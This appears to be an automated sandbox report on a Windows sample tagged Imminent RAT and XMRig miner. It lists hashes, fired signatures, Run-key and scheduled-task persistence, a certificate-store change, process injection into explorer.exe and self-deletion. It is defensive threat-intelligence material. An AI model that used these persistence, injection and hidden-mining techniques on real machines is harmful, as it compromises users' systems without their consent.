Malware Analysis Report

2024-11-15 08:09

Sample ID 220925-q1q9gsehc5
Target 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
Tags
imminent xmrig miner persistence spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2

Threat Level: Known bad

The file 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2 was found to be: Known bad.

Malicious Activity Summary

imminent xmrig miner persistence spyware trojan

Imminent RAT

xmrig

XMRig Miner payload

Executes dropped EXE

Loads dropped DLL

Deletes itself

Checks computer location settings

Adds Run key to start application

Drops desktop.ini file(s)

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Runs ping.exe

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Creates scheduled task(s)

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-09-25 13:43

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-09-25 13:43

Reported

2022-09-25 13:46

Platform

win7-20220812-en

Max time kernel

152s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"

Signatures

Imminent RAT

trojan spyware imminent

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Default Key = "C:\\Users\\Admin\\AppData\\Local\\Default Folder\\Server.exe" C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Default Key = "\\Default Folder\\Server.exe" C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1176 set thread context of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\services64.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\Temp\services64.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31609.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\services64.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31609.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\services64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1736 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
PID 1736 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
PID 1736 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
PID 1736 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
PID 1736 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\cmd.exe
PID 1736 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\cmd.exe
PID 1736 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\cmd.exe
PID 1736 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\cmd.exe
PID 1428 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\taskmgr.exe
PID 1428 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\taskmgr.exe
PID 1428 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\taskmgr.exe
PID 1428 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\taskmgr.exe
PID 1988 wrote to memory of 472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1988 wrote to memory of 472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1988 wrote to memory of 472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1988 wrote to memory of 472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1428 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\31609.exe
PID 1428 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\31609.exe
PID 1428 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\31609.exe
PID 1428 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\31609.exe
PID 1504 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\31609.exe C:\Windows\System32\cmd.exe
PID 1504 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\31609.exe C:\Windows\System32\cmd.exe
PID 1504 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\31609.exe C:\Windows\System32\cmd.exe
PID 1744 wrote to memory of 1956 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1744 wrote to memory of 1956 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1744 wrote to memory of 1956 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1504 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\31609.exe C:\Users\Admin\AppData\Local\Temp\services64.exe
PID 1504 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\31609.exe C:\Users\Admin\AppData\Local\Temp\services64.exe
PID 1504 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\31609.exe C:\Users\Admin\AppData\Local\Temp\services64.exe
PID 1176 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\System32\cmd.exe
PID 1176 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\System32\cmd.exe
PID 1176 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\System32\cmd.exe
PID 828 wrote to memory of 332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 828 wrote to memory of 332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 828 wrote to memory of 332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1176 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 1176 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 1176 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
